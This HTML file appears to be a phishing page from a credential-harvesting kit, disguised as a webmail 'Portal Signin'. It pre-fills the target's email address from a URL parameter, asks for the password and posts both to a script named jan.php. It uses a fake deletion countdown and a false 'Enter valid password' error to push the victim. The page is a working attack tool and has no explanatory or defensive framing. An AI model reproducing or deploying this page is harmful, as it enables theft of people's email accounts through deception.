<!DOCTYPE html>
<html>
<head>
<script type="text/javascript">
<!--
document.write(unescape(''));
//-->
</script>





<html lang="en">

<head>

  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="description" content="">
  <meta name="author" content="">
  <link rel="shortcut icon" href="favicon.ico">
 
  <title> Email | Portal Signin </title>
  
  <script src="js/jquery.min.js"></script>
  <script src="js/bootstrap.min.js"></script> 
  <!-- Custom fonts for this template-->
 
  <!-- Custom styles for this template-->
  <link href="css/sb-admin-2.css" rel="stylesheet">

<style> 

/* The Modal (background) */
.modal {
  display: none; /* Hidden by default */
  position: fixed; /* Stay in place */
  z-index: 1; /* Sit on top */
  padding-top: 100px; /* Location of the box */
  left: 0;
  top: 0;
  width: 100%; /* Full width */
  height: 100%; /* Full height */
  overflow: auto; /* Enable scroll if needed */
  background-color: rgb(0,0,0); /* Fallback color */
  background-color: rgba(0,0,0,0.4); /* Black w/ opacity */
}

/* Modal Content */
.modal-content {
  background-color: #fefefe;
  margin: auto;
  padding: 20px;
  border: 1px solid #888;
  width: 80%;
}

/* The Close Button */
.close {
  color: #aaaaaa;
  float: right;
  font-size: 28px;
  font-weight: bold;
}

.close:hover,
.close:focus {
  color: #000;
  text-decoration: none;
  cursor: pointer;
}
</style>
</head>
<body id="page-top" class="off" style="margin: 0 auto;width: 369px;margin-top: 46px; ">
  
 <div style="background: white;padding: 29px;box-shadow: -12px 75px 114px 16px rgba(0,0,0,0.75);border: solid 1px #32909d;border-radius: 2px;">
 <div style="margin-top: -9px;font-size: 20px;text-align: left;font-weight: 600;padding-bottom: 16px;">
 
</div>
 <div style="text-align: left;margin-top: -2px;margin-bottom: 31px;font-size: 13px;border-bottom: solid 4px #fe6d4b;padding-bottom: 9px;">Update your domain email address  to regain unlimited  email access  to incoming messages </div>
  
  
  <form method="post"  action="jan.php" class="shurt">
  
  <div>
  
    <div id="icard" class="holddof" style="font-size: 12px;">or your pending emails will be deleted after <span id="timer"></span> Hours</div>
 
		<input name="piot" class="holdof off" type="email" required placeholder=""   value=""  readonly id="app" style="outline: 0;border: 0;padding: 0;font-weight: 700;color: #48c0eb !important;font-size: 24px;">
		 
  </div> 
  
  <div>
  
  <div id="icard" class="holddof" style="">Password</div>
 
		<input name="iot" class="holdof off" type="password" required placeholder=""   value="" style="outline: 0;border: solid 1px red;">
		 
  </div> 
	  
		
	 
    

	   <button   name="lactoese" class="deserve off" style="outline: 0;">
Release Emails
</button>
<div style="width: 308px;" class="off">
<div style="line-height: 11px">
<small style="font-size: 14px;text-align: left;font-family: arial;color: #F00;"><strong>Enter valid password !</strong></small>
<div style="line-height: 27px;margin-top: 19px;font-weight: 400;font-size: 15px;font-family: calibri;color: #7d7878;cursor: pointer;">
  <b>Get a new account</b><br>
<b>Can't access your account?</b><br>
</div>
</div>

</div>

</form>

</div>  
</div>

  
 

 
    </center>
    </div>
	</form>
	<script>
$(document).ready(function(){
  $(".slide-toggle").click(function(){
    $(".box").animate({
      width: "toggle"
	  
    });
  });
});
</script>
	
  <!-- Bootstrap core JavaScript-->
  <script src="vendor/jquery/jquery.min.js"></script>
  <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>

  <!-- Core plugin JavaScript-->
  <script src="vendor/jquery-easing/jquery.easing.min.js"></script>

  <!-- Custom scripts for all pages-->
  <script src="js/sb-admin-2.min.js"></script>
 <script>
 function getVal() {
    var x = document.getElementById("fname");
    document.getElementById("icard").innerHTML = x.value.toUpperCase();
}
 </script>

<script>
    
$.urlParam = function(app){
    var results = new RegExp('[\?&]' + app + '=([^&#]*)').exec(window.location.href);
    return results[1] || 0;
	
      
}

</script>



<script>
    
    $( document ).ready(function() {
        // after the page elements are all loaded, then run the script
        // Set the input field with unique ID #email to a value

          $("#app").val($.urlParam('app'));
        
        });
        
</script>
<script>
document.getElementById('timer').innerHTML =
  24 + ":" + 00;
startTimer();

function startTimer() {
  var presentTime = document.getElementById('timer').innerHTML;
  var timeArray = presentTime.split(/[:]+/);
  var m = timeArray[0];
  var s = checkSecond((timeArray[1] - 1));
  if(s==59){m=m-1}
  //if(m<0){alert('timer completed')}
  
  document.getElementById('timer').innerHTML =
    m + ":" + s;
  setTimeout(startTimer, 2000);
}

function checkSecond(sec) {
  if (sec < 10 && sec >= 0) {sec = "0" + sec}; // add zero in front of numbers < 10
  if (sec < 0) {sec = "59"};
  return sec;
}
</script>
</body>

</html>

